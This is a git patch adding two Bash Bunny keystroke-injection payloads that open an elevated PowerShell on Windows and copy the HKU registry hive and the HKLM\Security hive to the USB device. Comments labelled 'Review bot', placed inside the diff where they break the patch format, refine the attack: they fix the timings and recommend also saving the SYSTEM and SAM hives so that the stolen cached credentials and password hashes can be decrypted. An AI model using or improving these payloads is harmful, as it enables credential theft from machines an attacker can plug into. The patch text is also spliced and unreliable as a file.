From 3904f165d9f07f0597a0e8e32fed5f23c4d35349 Mon Sep 17 00:00:00 2001
From: cribb-it <24548670+cribb-it@users.noreply.github.com>
Date: Mon, 14 Dec 2020 23:53:42 +0000
Subject: [PATCH] Added new payload WIN_PoSH_HKU_RegBackUp (#424)
* Add files via upload
* Update readme.md
* Update payload.txt
* Update readme.md
* Update readme.md
* Update readme.md
* Update readme.md
* Update readme.md
* Add files via upload
* Update readme.md
* Update readme.md
* Add Payload WIN_PoSH_HKU_RegBackUp
* Update readme.md
* Update payload.txt
* Change for admin shell
* Update readme.md
* Update payload.txt
* Update payload.txt
* Update readme.md
* Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny
---
 .../WIN_PoSH_HKU_RegBackUp/payload.txt | 23 ++++++++++++++
 .../WIN_PoSH_HKU_RegBackUp/readme.md | 30 +++++++++++++++++++
 .../WIN_PoSH_SaveSecurityHive/payload.txt | 22 ++++++++++++++
 .../WIN_PoSH_SaveSecurityHive/readme.md | 26 ++++++++++++++++
 4 files changed, 101 insertions(+)
 create mode 100644 payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt
 create mode 100644 payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md
 create mode 100644 payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
 create mode 100644 payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md
diff --git a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt
new file mode 100644
index 00000000..8e2d8473
--- /dev/null
+++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/payload.txt
@@ -0,0 +1,23 @@
+# Title: Backup User registry (HKU)
+# Description: Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny
+# Author: Cribbit
+# Version: 1.1
+# Category: Exfiltration
+# Target: Windows 10 (Creators Update) (Powershell)
+# Attackmodes: HID & STORAGE
+# Config: Usesful root keys [ HKLM | HKCU | HKCR | HKU | HKCC ]
+
+LED SETUP
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+Q DELAY 200
+REM RUN WIN powershell -NoP -NonI -W Hidden -Exec Bypass ".(Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg'))"
+Q GUI x
+Q STRING a
+Q DELAY 100
+Q ALT y
+Q DELAY 100
+Q STRING "Reg EXPORT HKU ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\keys.reg') /y"
+Q ENTER
+LED FINISH
diff --git a/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md
new file mode 100644
index 00000000..5255d7ea
--- /dev/null
+++ b/payloads/library/exfiltration/WIN_PoSH_HKU_RegBackUp/readme.md
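Review bot: The `Q DELAY 100` between `Q STRING a` and `Q ALT y`, and the second one before the `Reg EXPORT` line, are likely too short for the elevated console and its UAC consent prompt to open and take keyboard focus, so the `ALT y` and the typed command can land on the wrong window; the WIN_PoSH_SaveSecurityHive payload added in this same commit uses `sleep 2` at both points, and this payload should use the same waits. `LED FINISH` is reached immediately after `Q ENTER`, before reg.exe has written anything, so an operator who unplugs on green can truncate an HKU export that may be large on a multi-user machine; a delay before `LED FINISH` would keep the green LED meaning "finished" as the readme describes it. The `REM RUN WIN powershell ...` line is a Ducky Script comment keyword, not a bash one, and without a `Q` prefix it will presumably be executed by the payload shell, so if it is a kept-for-reference alternative it should start with `#`. reg.exe also does not create the `loot` folder on the udisk; unless the library guarantees it exists, a `mkdir -p /root/udisk/loot` before `ATTACKMODE` (while the udisk is still mounted on the Bunny) would avoid a silent failure.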
@@ -0,0 +1,30 @@
+# Backup User registry (HKU)
+* Author: Cribbit
+* Version: 1.1
+* Target: Windows 10 (Creators Update) (Powershell)
+* Category: Exfiltration
+* Attackmode: HID & STORAGE
+
+## Change Log
+| Version | Changes |
+| ------- | -------------------------------|
+| 1.0 | Initial release |
+| 1.1 | Use Admin Shell (for all keys) |
+
+## Description
+Uses PowerShell, to run Reg.exe to export the HKU entry to a file on the bunny.
+
+## Configuration
+RootKeys: [ HKLM | HKCU | HKCR | HKU | HKCC ]
+
+Usesful Reg.exe export parameters:
+* /y Force overwriting the existing file without prompt.
+* /reg:32 Specifies the key should be accessed using the 32-bit registry view.
+* /reg:64 Specifies the key should be accessed using the 64-bit registry view.
+
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished |
diff --git a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
new file mode 100644
index 00000000..8dc767c9
--- /dev/null
+++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/payload.txt
@@ -0,0 +1,22 @@
+# Title: Save security hive
+# Description: Uses PowerShell, to run Reg.exe to save security hive to the bunny.
+# Author: Cribbit
+# Version: 1.0
+# Category: Exfiltration
+# Target: Windows 10 Creators Update (Powershell)
+# Attackmodes: HID & STORAGE
+# Props: Ben Clark (RTFM)
+
+LED SETUP
+ATTACKMODE HID STORAGE
+
+LED ATTACK
+Q DELAY 200
+Q GUI x
+Q STRING a
+sleep 2
+Q ALT y
+sleep 2
+Q STRING "Reg SAVE HKLM\Security ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_security.hive') /y"
+Q ENTER
+LED FINISH
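Review bot: Saving only `HKLM\Security` produces loot that cannot be decrypted on its own: the LSA secrets and cached credentials in the SECURITY hive are protected with the boot key held in the SYSTEM hive, so the payload should also save that hive, e.g. `Q STRING "Reg SAVE HKLM\System ((gwmi win32_volume -f 'label=''BashBunny''').Name+'loot\\'+\$env:computername+'_system.hive') /y"` followed by `Q ENTER` (and `HKLM\SAM` the same way if local account hashes are wanted). The `GUI x` / `a` / `ALT y` sequence only works when the logged-on user is a local administrator and UAC shows a consent prompt; for a standard user the prompt asks for credentials, `ALT y` does nothing, and the `Reg` line is presumably typed into whatever window has focus, so the `# Target:` header should state that precondition. The elevated console is left open with the typed command visible after `Q ENTER`, and `LED FINISH` lights before reg.exe has necessarily finished writing; a short delay followed by `Q STRING exit` / `Q ENTER` before `LED FINISH` would close the window and make green mean done.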
diff --git a/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md
new file mode 100644
index 00000000..bf8078b8
--- /dev/null
+++ b/payloads/library/exfiltration/WIN_PoSH_SaveSecurityHive/readme.md
@@ -0,0 +1,26 @@
+# Save security hive
+* Author: Cribbit
+* Version: 1.0
+* Target: Windows 10 (Creators Update) (Powershell)
+* Category: Exfiltration
+* Attackmode: HID & STORAGE
+* Props: Ben Clark (RTFM)
+
+## Change Log
+| Version | Changes |
+| ------- | ------------------------------|
+| 1.0 | Initial release |
+
+## Description
+Uses PowerShell, to run Reg.exe to save security hive to the bunny.
+## Configuration
+Usesful Reg.exe save parameters:
+* /y Force overwriting the existing file without prompt.
+* /reg:32 Specifies the key should be accessed using the 32-bit registry view.
+* /reg:64 Specifies the key should be accessed using the 64-bit registry view.
+## Colors
+| Status | Color | Description |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP | Magenta solid | Setting attack mode |
+| ATTACK | Yellow single blink | Injecting Powershell script |
+| FINISH | Green blink followed by SOLID | Script is finished |
\ No newline at end of file